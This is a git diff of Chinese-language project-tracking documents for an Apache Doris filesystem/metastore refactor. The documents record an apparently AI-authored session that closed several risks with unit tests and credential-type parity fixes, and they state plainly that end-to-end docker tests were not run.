b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,10 +7,24 @@ --- -**更新时间**:2026-06-18(实现 session:**FU-T01 完成** — HDFS typed BE model,R-007 闭环;**+ 计划调整 D-011:P1-T06 之前先做 FU-T02[R-008]+FU-T03[R-006]**) +**更新时间**:2026-06-18(实现 session:**FU-T02 + FU-T03 完成** — fe-filesystem 对象存储补齐,**R-008 + R-006 闭环**;下一步 P1-T06) **更新人**:Claude(Opus 4.8) -## 这次 session 完成了什么(FU-T01) +## 这次 session 完成了什么(FU-T02 + FU-T03) + +**FU-T02 ✅(R-008 闭环,commit `e5b088b14e7`)** — fe-filesystem typed OSS/COS/OBS BE map 补 `AWS_CREDENTIALS_PROVIDER_TYPE`: +- 在 `Oss/Cos/ObsFileSystemProperties.toBackendKv()` 末尾**内联**镜像 legacy `AbstractS3CompatibleProperties.doBuildS3Configuration`(storage 包 :117-120):`StringUtils.isBlank(accessKey) && StringUtils.isBlank(secretKey)` → `kv.put("AWS_CREDENTIALS_PROVIDER_TYPE", "ANONYMOUS")`,否则省略。仅 BE map,不碰 `toHadoopConfigurationMap`(legacy 该键只进 `getBackendConfigProperties`)。 +- **DV-005(偏差,已记)**:原 D-011 说「加 `credentialsProviderType` 字段镜像 S3」——recon 证伪:legacy OSS/COS/OBS **不** override `getAwsCredentialsProviderTypeForBackend()`(只 `S3Properties` override 恒非空),即**无可配置 provider type**;加字段会引入 legacy 没有的旋钮 + 可能对有凭据 catalog 误发 `DEFAULT`(D-011 验收明确「非无条件 DEFAULT」);且 `S3CredentialsProviderType` 在 `fe-filesystem-s3`、`fe-filesystem-{oss,cos,obs}` 不依赖 s3 → 复用须扩白名单。故改内联条件(更简、更贴 legacy,符合用户本轮「处理逻辑一致」指令;无字段/枚举/跨模块依赖/白名单扩展/AskUserQuestion)。 +- **TDD**:3 个 `toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials`(RED `expected but was ` → GREEN)+ 3 个有凭据测试加 `assertNull(AWS_CREDENTIALS_PROVIDER_TYPE)` 守「有凭据时省略」。OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0。 + +**FU-T03 ✅(R-006 闭环,本次 commit)** — fe-filesystem 调优默认 UT 守护(纯 test-only,不动 main): +- `S3/Oss/Cos/ObsFileSystemPropertiesTest` 各加 1 个 `toMaps_emit*TuningDefaultsWhenNotConfigured`:不显式设调优键时断 **BE map**(`AWS_MAX_CONNECTIONS`/`AWS_REQUEST_TIMEOUT_MS`/`AWS_CONNECTION_TIMEOUT_MS`)+ **Hadoop map**(`fs.s3a.connection.maximum`/`...request.timeout`/`...timeout`)= S3 `50/3000/1000`、OSS/COS/OBS `100/10000/10000`。 +- **关键**:期望值用**字面量**非 `DEFAULT_*` 常量(否则改常量两侧同步=测试恒绿,守不住)。已核 legacy parity:`S3Properties.Env`(50/3000/1000)、`OSS/COS/OBSProperties`(各 100/10000/10000)。 +- **mutation 证**:sed 改 4 个 `DEFAULT_MAX_CONNECTIONS` → 4 测全红(`<50> but was <99>` / `<100> but was <999>`),revert 后全绿。S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0×4。 + +**红线/守门**:`git diff --name-only` 全程仅落 `fe-filesystem-{oss,cos,obs}/{main,test}`(FU-T02)+ 4 个 `*PropertiesTest.java`(FU-T03)+ 本跟踪目录;mutation 用的 main 改动经 `git checkout` 还原(post-revert status 仅余 test 文件)。⚠️ **docker e2e 未跑**(本 session 仅 compile + UT + mutation)。 + +

      上一个 session(FU-T01,已完成) **FU-T01 ✅(D-010 授权,提升为 active)**:给 `fe-filesystem-hdfs` 新建 **HDFS typed BE model**,修复 P1-T04 全量切 typed BE 路引入的 HDFS BE 配置回归(**DV-004 / R-007 闭环**)。 @@ -26,37 +40,26 @@ **TDD/验证**:25 golden parity UT 钉 `toMap()`==legacy BE 键集(simple/kerberos/kerberos-via-Doris-alias/HA+3 负例/username/uri-derive/viewfs-jfs derive vs ofs-oss no-derive/allowFallback-blank/multi-uri/malformed-uri-fail-loud/XML/sysprop)。**fe-filesystem-hdfs 全模块 78/0/0** + checkstyle 0 + **RED/GREEN 经 mutation 证**(关 kerberos 块→`kerberosViaDorisAlias` 红)+ **fe-core `-pl fe-core -am compile` 绿**(验 FileSystemFactory/PluginManager 改)+ `git diff` 白名单干净。 **对抗 review(`wf_5db99e32-2ad`,27 agent,4 lens + verify)**:清场——packaging 无跨 loader 风险、独立 agent 逐键复核 byte-level parity、BE-only 无新 catalog 路回归、强 oss-hdfs-wrong-keys 断言被 verify **推翻**、`new Configuration()` 默认 bloat 是 legacy-faithful。**3 实质修**:①malformed-`uri` swallow→**fail-loud**(对齐 legacy);②2 stale 注释;③+11 测试。**F1**(config-dir 未接 `Config.hadoop_config_dir`)→ 用户选「现在接好」=sysprop 桥。 +
      ## 当前状态 -- 阶段:Research ✅ / Design ✅(**10 决策 D-001..D-010**)/ **Implement 🚧(P1 5/6 + FU-T01 ✅,仅剩 P1-T06 验证)**。 -- 任务计数 **8/14**(P0: 2/2 ✅ | P1: 5/6 | **FU-T01 ✅** | P2: 0/5 | P3a: 0/1)| follow-up 占位 FU-T02 + P3b。 -- **R-007 已闭环**(HDFS typed BE model 落地)。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键。 -- ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + 对抗 review)。 +- 阶段:Research ✅ / Design ✅(**11 决策 D-001..D-011**)/ **Implement 🚧(P1 5/6 + FU-T01/T02/T03 ✅,仅剩 P1-T06 验证)**。 +- 任务计数 **8/14**(P0: 2/2 ✅ | P1: 5/6 | P2: 0/5 | P3a: 0/1)| follow-up **FU-T01 ✅ + FU-T02 ✅ + FU-T03 ✅**(均已完成)| P3b 占位。 +- **R-006 / R-007 / R-008 全部已闭环**。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键 + OSS/COS/OBS 无凭据补 `ANONYMOUS` + 调优默认有 UT 守护。 +- ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + mutation 证)。 -## 下一步(明确):先 FU-T02(R-008)+ FU-T03(R-006),再 P1-T06 -> **用户 2026-06-18 调整顺序(D-011)**:在 P1-T06 docker 之前先把 R-008 + R-006 处理掉,使 P1-T06 成为干净全绿验收(不带已知漂移)。 +## 下一步(明确):P1-T06(P1 验证收口) +> **R-006/R-007/R-008 已全闭环** → P1-T06 应为**干净全绿验收**(不带已知漂移)。 > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** -**① FU-T02(R-008)— fe-filesystem OSS/COS/OBS 补 `AWS_CREDENTIALS_PROVIDER_TYPE`**(D-011 授权 `fe-filesystem-{oss,cos,obs}`): -- 给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType`(镜像 `S3FileSystemProperties`),`toBackendKv()`/`toMap()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`。**精确 parity** = ak/sk **皆空** → `ANONYMOUS`,否则**省略**(legacy OSS/COS/OBS 仅 blank-creds 才发,**非**无条件 `DEFAULT`;S3 typed 已有,故只补 OSS/COS/OBS)。 -- **现场 recon 必做**:对照 legacy fe-core `AbstractS3CompatibleProperties.doBuildS3Configuration`(:117-129) + `OSS/COS/OBSProperties`(均不 override `getAwsCredentialsProviderTypeForBackend` → blank-creds 返回 `ANONYMOUS`;仅 `S3Properties` override 恒非空)。**核对 S3FileSystemProperties `credentialsProviderType` 的现成实现**(字段/枚举 `S3CredentialsProviderType`/`getMode()` 是否在 fe-filesystem-s3 内、能否给 OSS/COS/OBS 复用,**若须移到 api/spi 共享 → 先 AskUserQuestion 扩白名单**)。 -- **TDD(UT 落地,参 FU-T01)**:无凭据 OSS/COS/OBS map → `toMap()` 含 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(RED→GREEN);带 ak/sk 则不发/发 Simple 等价。 - -**② FU-T03(R-006)— fe-filesystem 调优默认 UT 断言**(D-011 授权 `fe-filesystem-{s3,oss,cos,obs}` test): -- 在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 **test-only** 断言:S3=50/3000/1000、OSS/COS/OBS=100/10000/10000(`toHadoopConfigurationMap` 的 `fs.s3a.connection.maximum` 等 + BE map `AWS_MAX_CONNECTIONS` 等)。**功能今日正确**(字段默认真发),本任务=补显式守护(mutation:改默认→测试红)。 -- **现场 recon**:核对各 `*FileSystemProperties` 的默认常量(S3 `DEFAULT_MAX_CONNECTIONS="50"` 等;OSS/COS/OBS 100/10000/10000 在哪——可能在各自 properties 或共享基类)+ 现有 test 已断言哪些(避免重复/漏)。 -- 纯 test additive,不动 main(除非与 FU-T02 共享改动)。 - -**③ 之后 P1-T06(P1 验证收口)**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。 -- **FU-T01 补后 HDFS-warehouse flavor(含 HA / kerberized)应通过**(R-007 闭环验证点);**FU-T02 补后无凭据 OSS/COS/OBS 应通过**(R-008 闭环);R-006 由 FU-T03 UT 守护 → 干净全绿。 -- **不部署 docker 则明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 +**P1-T06(P1 验证收口)**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。 +- **HDFS-warehouse flavor(含 HA / kerberized)应通过**(R-007 闭环验证点,FU-T01);**无凭据 OSS/COS/OBS 应通过**(R-008 闭环,FU-T02);**调优默认**由 FU-T03 UT 守护(R-006)→ 干净全绿。 +- **现场 recon 必做**:确认 docker paimon 测试套件入口(`enablePaimonTest=true` 如何起、5 flavor 的 regression-conf)+ 当前分支 jar 打包要点(paimon 模块需 `-am package -Dassembly.skipAssembly=true`,shade jar 携带 HiveConf)。**不部署 docker 则明确标「未跑 e2e」**(CLAUDE.md Rule 12),不得把「编译过」当「验证过」。 - 之后 P2(metastore SPI:P2-T01 新建 fe-connector-metastore-api …)+ P3a(fe-kerberos 叶子)。 ## 未决 / 需注意 -- ✅ 已闭环:R-007(FU-T01)。 -- 🔧 **R-008(修复中,D-011:P1-T06 前先修 = FU-T02 active-next)**:fe-filesystem typed OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`(无凭据 catalog 的 legacy `ANONYMOUS` 丢)。已授权 `fe-filesystem-{oss,cos,obs}`,可 UT 落地。 -- 🔧 **R-006(修复中,D-011:P1-T06 前先修 = FU-T03 active-next)**:fe-filesystem 调优默认值无显式 UT 守护(功能正确,仅测试健壮性)。已授权 `fe-filesystem-{s3,oss,cos,obs}` test。 -- 📌 **残留已知(非 FU-T01 引入,独立 FU)**:**oss-hdfs**(`oss://` warehouse + JindoFS)在 typed 路缺 oss 凭据键——P1-T04 已起(HDFS-family typed 缺口),彻底修需 fe-filesystem **OssHdfs typed model**(独立大动作,超白名单)。FU-T01 让 HDFS provider 对 bare-`oss://` fs.defaultFS 发无凭据 HDFS 键(review F3 MINOR,latent 误配曝露,非 working catalog 回归)。 +- ✅ 已闭环:R-006(FU-T03)、R-007(FU-T01)、R-008(FU-T02)。 +- 📌 **残留已知(非本批引入,独立 FU)**:**oss-hdfs**(`oss://` warehouse + JindoFS)在 typed 路缺 oss 凭据键——P1-T04 已起(HDFS-family typed 缺口),彻底修需 fe-filesystem **OssHdfs typed model**(独立大动作,超白名单)。FU-T01 让 HDFS provider 对 bare-`oss://` fs.defaultFS 发无凭据 HDFS 键(review F3 MINOR,latent 误配曝露,非 working catalog 回归)。 - 📌 **scan-time 重 validate**:`getStorageProperties()` 每次 scan 经 `bindAll`→`bind()`→`of().validate()`(无 memoization)——valid catalog 内禀 dormant;是 typed-路通性(P1-T02/D-009),非 FU-T01 专有。 - ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index ff031e12f5a93a..76588aa4658908 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -17,12 +17,12 @@ --- ## 当前活跃 task -- **FU-T01 ✅ 完成(2026-06-17,D-010 授权,commit 待提交)**:给 `fe-filesystem-hdfs` 新建 HDFS typed BE model(`HdfsFileSystemProperties` + `HdfsConfigFileLoader` + provider bind),修复 P1-T04 的 HDFS BE 回归(DV-004/**R-007 闭环**)。移植源 = fe-property `HdfsProperties`(parity by construction);kerberos=K1(BE-key 字符串、不建 fe-kerberos);BE-only(不实现 HadoopStorageProperties)。验证:fe-filesystem-hdfs 全模块 **78/0**(含 25 golden parity;既有 create() 路零回归)+ checkstyle 0 + RED/GREEN(mutation) + fe-core 编译绿。**对抗 review `wf_5db99e32-2ad`(27 agent)**清场,3 实质修(malformed-uri fail-loud + 2 stale 注释 + 11 测试)+ **F1 接线**(config-dir sysprop 桥 `Config.hadoop_config_dir`,用户选「现在接好」)。⚠️ docker e2e 未跑。 -- **下一步(用户 2026-06-18 调整顺序,D-011):先 `FU-T02`(R-008)+ `FU-T03`(R-006),再 `P1-T06`**。 - - **FU-T02(R-008)**:fe-filesystem `Oss/Cos/ObsFileSystemProperties` 补 `AWS_CREDENTIALS_PROVIDER_TYPE`(ak/sk 皆空→`ANONYMOUS` 精确 parity,镜像 S3)。 - - **FU-T03(R-006)**:`S3/Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认 UT 断言(S3 50/3000/1000;OSS/COS/OBS 100/10000/10000)。 - - 两者均 D-011 授权触碰 `fe-filesystem-{s3,oss,cos,obs}`(白名单已 +);可 UT 落地(参 FU-T01)。 - - **再 `P1-T06`**(P1 验证收口):paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor + vended + Kerberos HMS + **真 T1 闸 Option C**;FU-T01 补后 HDFS flavor 应通过、FU-T02 补后无凭据 OSS/COS/OBS 应通过 → **干净全绿验收**。不部署 docker 则标「未跑 e2e」(Rule 12)。 +- **FU-T02 ✅ + FU-T03 ✅ 完成(2026-06-18,D-011 授权)**:P1-T06 前的两项 fe-filesystem 对象存储补齐均完成(**R-008 + R-006 闭环**)。 + - **FU-T02(R-008,commit `e5b088b14e7`)**:`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties.getAwsCredentialsProviderTypeForBackend()`——ak/sk 皆空→`AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略。**DV-005**:不加字段/枚举(legacy OSS/COS/OBS 本无可配置 provider type,且 `S3CredentialsProviderType` 在 s3 模块、oss/cos/obs 不依赖)。TDD RED(`expected but was `)→GREEN;OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0。 + - **FU-T03(R-006,本次 commit)**:4 个 `*FileSystemPropertiesTest` 各加 1 个调优默认守护测试(BE map + Hadoop map,字面量期望值非常量);S3 50/3000/1000、OSS/COS/OBS 100/10000/10000(已核 legacy parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→ 4 测全红证有效。S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + sibling 绿、checkstyle 0。纯 test-only。 + - ⚠️ docker e2e 未跑(两者真闸均在 P1-T06)。 +- **FU-T01 ✅(2026-06-17,D-010,commit `a426648f209`)**:`fe-filesystem-hdfs` HDFS typed BE model(**R-007 闭环**)。78/0 + 对抗 review `wf_5db99e32-2ad` 清场。 +- **下一步 = `P1-T06`(P1 验证收口)**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。R-006/R-007/R-008 均已闭环 → P1-T06 应为**干净全绿验收**(HDFS-warehouse 含 HA/kerberized 应通过;无凭据 OSS/COS/OBS 应通过)。不部署 docker 则明确标「未跑 e2e」(Rule 12)。之后 P2(metastore SPI)+ P3a(fe-kerberos 叶子)。 - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 @@ -36,6 +36,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-18 **FU-T02 ✅ + FU-T03 ✅**(D-011,P1-T06 前补齐 fe-filesystem 对象存储;R-008 + R-006 闭环):**FU-T02**(commit `e5b088b14e7`)`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties` 基类条件(ak/sk 皆空发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略);**DV-005** 不加字段/枚举(legacy OSS/COS/OBS 无可配置 provider type、`S3CredentialsProviderType` 在 s3 模块不可达,加字段反更不贴 legacy + 须扩白名单)——比原 D-011「加字段镜像 S3」更简更贴 legacy(用户本轮指令「处理逻辑一致」)。TDD RED→GREEN(3 ANONYMOUS 测 + 3 有凭据 assertNull 守省略)。**FU-T03** 4 个 `*PropertiesTest` 加调优默认守护(BE+Hadoop map,字面量期望值;S3 50/3000/1000、OSS/COS/OBS 100/10000/10000,已核 legacy `S3Properties.Env`/`OSS|COS|OBSProperties` parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→4 测全红证守护。验证:S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0×4、`git diff` 白名单干净。⚠️ docker e2e 未跑(真闸 P1-T06)。**下一步 P1-T06**(R-006/7/8 全闭环 → 干净全绿验收)。 - 2026-06-17 **FU-T01 ✅**(D-010 授权,HDFS typed BE model 修 DV-004/R-007):新建 `fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`(BE-only,忠实移植 legacy `initBackendConfigProperties`)+ `HdfsConfigFileLoader`(XML 资源)+ provider `bind()`/`create(P)`(`create(Map)`/`supports()` 不动)+ pom `fe-foundation`/`commons-lang3`。kerberos=**K1**(BE-key 字符串内联,不建 fe-kerberos,不碰 create()-side authenticator;用户 AskUserQuestion 选)。**真 parity 在 UT 落地**(非 paimon Option C):25 golden parity 钉 `toMap()`==legacy BE 键集(simple/kerberos/HA/username/uri-derive/XML/sysprop…)。验证 fe-filesystem-hdfs **78/0** + checkstyle 0 + RED/GREEN(mutation 关 kerberos 块→红) + fe-core `-am compile` 绿 + `git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场(packaging 无跨 loader、parity byte-level 复核、BE-only 无新 catalog 路回归、强 oss-hdfs 断言被 verify 推翻),3 实质修(①malformed-uri swallow→fail-loud 对齐 legacy;②2 处 stale 注释[bindAll javadoc/paimon KNOWN GAP 1];③+11 测试)。**F1**(XML config-dir 未接 `Config.hadoop_config_dir`)用户选「**现在接好**」=fe-core `FileSystemFactory` setProperty 桥(leaf 读 sysprop)。**额外触碰 3 已白名单文件**(FileSystemFactory/FileSystemPluginManager/PaimonScanPlanProvider,均 project-owned 微改/注释)。残留 oss-hdfs JindoFS 凭据=独立 FU。⚠️ docker e2e 未跑(HA/kerberized 真闸 P1-T06)。 - 2026-06-17 **P1-T05 ✅**(断开 paimon→fe-property 依赖边):删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(仅删 pom 边——import/call 已在 P1-T03 清 DV-003-b)。recon 确认 paimon src(main+test)`org.apache.doris.property` 已 ZERO、唯一物理耦合是 pom :72,其余 `fe-property` 字样皆历史注释(不动)。**RED/GREEN=构建闸**(无 UT 可写):删后全模块编译+全 UT 仍绿=证无隐藏 transitive 断裂。验证:paimon 全模块 **293/0/0/1skip**、grep 归零、pom 无 fe-property、checkstyle 0、import-gate PASS、白名单干净(仅 pom)。**fe-property 变 0 消费者孤儿(本次不物理删,D-005)**。⚠️ docker e2e 未跑。仅剩 P1-T06 验证即 P1 收口。 - 2026-06-17 **P1-T04 ✅**(paimon `PaimonScanPlanProvider` BE 静态凭据全量切 `getStorageProperties().toBackendProperties().ifPresent(putAll(toMap()))`→`location.*`;vended 不动、叠后保序):现场 recon 揪出 **DV-002 未覆盖的 HDFS 缺口**——fe-filesystem 无 HDFS typed BE model(`HdfsFileSystemProvider.bind` 抛→`bindAll` 跳过),legacy `getBackendStorageProperties()` 经 fe-core 发的 HDFS `hadoop/dfs/HA/kerberos`→`THdfsParams` 是 load-bearing,全量切会丢→HDFS paimon 原生读回归;`getBackendStorageProperties()` 是 ConnectorContext 方法不依赖 fe-property→P1-T05 不需此切换,纯 D-003 统一。**用户定全量切 + 接受 HDFS 回归 + follow-up 补 HDFS typed BE 类**(DV-004/R-007/FU-T01)。TDD RED(`expected ak was null`)→GREEN;52/0 + 全模块 292/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净(2 文件)。**对抗 review `wf_09745716-d48`**(10 agent)confirm 4:MAJOR=R-008(OSS/COS/OBS typed 缺 `AWS_CREDENTIALS_PROVIDER_TYPE` ANONYMOUS,fe-filesystem 超白名单→FU-T02,仅无凭据 catalog)+ 3 test-gap 已修(新增 Optional.empty 跳过 + 多 entry merge 测试);推翻 3 假 finding(含实测 mutation 证「测试钉了新 seam」)。⚠️ docker e2e 未跑。 diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index 85e00b08fc5a95..fc3c173b302e88 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -11,7 +11,7 @@ - **缓解(DV-003 修订)**:T1 自动逐键 UT **不可在单测落地**(fe-filesystem 对象存储 impl 是运行时插件,不在任何单测 classpath)→ 改为 **paimon connector-local 契约 UT**(storage map 叠加/last-write-wins/kerberos-ordering)+ **docker P1-T06 5-flavor 作真等价闸**;P0-T01 4-agent recon + DV-002 code-read 等价为依据。 - **触发判据**:docker P1-T06 任一 flavor 读私有桶 403 / 配置缺键。 -## R-006 — 调优默认值(tuning defaults)无显式 UT 守护(P1-T03 删 canonical 测试暴露的 fe-filesystem 测试缺口)| 状态:修复中(2026-06-18 D-011:P1-T06 之前先修,FU-T03 active-next;授权 fe-filesystem-{s3,oss,cos,obs} test) +## R-006 — 调优默认值(tuning defaults)无显式 UT 守护(P1-T03 删 canonical 测试暴露的 fe-filesystem 测试缺口)| 状态:已闭环(2026-06-18 FU-T03 完成 — `S3/Oss/Cos/ObsFileSystemPropertiesTest` 各加 `toMaps_emit*TuningDefaultsWhenNotConfigured`,断 BE map + Hadoop map 的 max-conn/req-timeout/conn-timeout 默认[S3 50/3000/1000、OSS/COS/OBS 100/10000/10000],**字面量期望值非常量**;mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS` → 4 测全红证守护有效;纯 test-only,checkstyle 0) - **描述**:P1-T03 删 paimon `buildHadoopConfigurationEmitsS3TuningDefaults` 等 canonical 测试(翻译职责移交 fe-filesystem)。对抗 review(`wf_76df09a4-c2f`)确认 + 直接核实:fe-filesystem `S3FileSystemPropertiesTest.toHadoopProperties_*` **不显式断言**调优默认值(`fs.s3a.connection.maximum=50`/`request.timeout=3000`/`timeout=1000`;line72 只设输入 `s3.connection.maximum=64` 非断默认),`Oss/Cos/ObsFileSystemPropertiesTest` 同样**零调优断言**(OSS/COS/OBS 默认 100/10000/10000)。**canonical 键翻译 + endpoint-from-region 派生 IS 已覆盖**(已核:`OssFileSystemPropertiesTest:108-110` region→`-internal` endpoint、Cos/Obs endpoint+creds),唯**调优默认值**裸奔。 - **影响**:**功能今日正确**(`S3FileSystemProperties.toHadoopConfigurationMap()` 经字段默认 `DEFAULT_MAX_CONNECTIONS="50"` 等真发,paimon `buildStorageHadoopConfig` 正确调用);但若未来改 fe-filesystem 误删某调优默认,**无 UT 报红**(仅 docker 运行期暴露)→ 测试健壮性回归。 - **缓解**:**docker P1-T06** 为运行期兜底;**建议 follow-up**(**超出当前 P1 白名单——fe-filesystem 禁碰**):在 `S3FileSystemPropertiesTest` + `Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认断言(test-only additive)。在 fe-filesystem 收口/迁移批次或经用户批准的小补丁中做。**不在 paimon 重复断言**(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言为同义反复,不守 fe-filesystem 默认)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index feea66e98b09b4..26aad1906a3350 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -142,7 +142,8 @@ - **验收**:无凭据 OSS/COS/OBS typed BE map 与 legacy 等价(含 `ANONYMOUS`);有凭据零变化;UT 与 S3 typed 对照;checkstyle 0;`git diff` 仅落 `fe-filesystem-{oss,cos,obs}/**`(recon 若证须 api/spi 共享类型则先 AskUserQuestion)。 - **依赖**:P1-T04(暴露缺口,对抗 review `wf_09745716-d48`)。**D-011 授权**触碰 `fe-filesystem-{oss,cos,obs}`(白名单已 +)。**先做(与 FU-T03 一道)再 P1-T06。** -### FU-T03 🔜(active-next — 用户 2026-06-18 + D-011 授权;排在 P1-T06 之前)给 fe-filesystem S3/OSS/COS/OBS 加调优默认 UT 断言(修 R-006) +### FU-T03 ✅(2026-06-18 完成;D-011 授权)给 fe-filesystem S3/OSS/COS/OBS 加调优默认 UT 断言(修 R-006) +- **完成态(2026-06-18,commit 待提交)**:4 个测试类各加 1 个 `toMaps_emit*TuningDefaultsWhenNotConfigured`(test-only,不动 main)——不显式设调优键时,断 **BE map**(`toMap()`/S3 `toFileSystemKv()`:`AWS_MAX_CONNECTIONS`/`AWS_REQUEST_TIMEOUT_MS`/`AWS_CONNECTION_TIMEOUT_MS`)+ **Hadoop map**(`toHadoopConfigurationMap()`:`fs.s3a.connection.maximum`/`...request.timeout`/`...timeout`)= S3 `50/3000/1000`、OSS/COS/OBS `100/10000/10000`。**期望值用字面量非 `DEFAULT_*` 常量**(否则改常量两侧同步变=测试恒绿,守不住)。已核对 legacy parity:`S3Properties.Env`(50/3000/1000)、`OSS/COS/OBSProperties`(各 100/10000/10000)。**mutation 证**:sed 改 4 个 `DEFAULT_MAX_CONNECTIONS`→ 4 测全红(`expected <50> but was <99>` / `<100> but was <999>`),revert 后全绿。验证:S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0、`git diff` 仅落 4 个 `*PropertiesTest.java`。 - **做什么**:在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 **test-only** 断言守护调优默认值:S3=`fs.s3a.connection.maximum=50`/`request.timeout=3000`/`timeout=1000`(BE `AWS_MAX_CONNECTIONS=50` 等)、OSS/COS/OBS=`100/10000/10000`。守 P1-T03 删 paimon canonical tuning 测试暴露的 fe-filesystem 测试缺口。 - **TDD**:断言 `toHadoopConfigurationMap()` / `toBackendProperties().toMap()` 在不显式设调优键时发各自默认值(mutation:改 fe-filesystem 字段默认 → 测试应红)。**功能今日正确**(字段默认真发),本任务=补显式 UT 守护。 - **验收**:4 个 `*FileSystemPropertiesTest` 各含调优默认断言(S3 50/3000/1000;OSS/COS/OBS 100/10000/10000);checkstyle 0;纯 test additive,不动 main(除非 R-006 与 FU-T02 共享改动);`git diff` 仅落 `fe-filesystem-{s3,oss,cos,obs}/src/test/**`。 From f5b5090b958de99985e4424ab1032684ceb1f6fa Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 05:12:22 +0800 Subject: [PATCH 088/128] =?UTF-8?q?docs(storage-refactor):=20D-012=20?= =?UTF-8?q?=E2=80=94=20defer=20P1-T06=20docker,=20start=20P2=20(metastore?= =?UTF-8?q?=20SPI)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit User decided to skip P1-T06 for now and begin the next phase (P2, metastore SPI) directly. P1-T06 is deferred, not cancelled: its docker storage-equivalence validation is folded into P2-T05's docker run (same enablePaimonTest=true 5-flavor suite), so e2e runs once at P2 close. Record D-012; repoint HANDOFF/PROGRESS next-step to P2-T01 (new fe-connector-metastore-api module) with the required recon checklist (design 3.1, D-006/D-004, fe-core metastore package, PaimonCatalogFactory). No code change. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore-storage-refactor/HANDOFF.md | 25 +++++++++++-------- .../metastore-storage-refactor/PROGRESS.md | 4 +-- .../decisions-log.md | 6 +++++ 3 files changed, 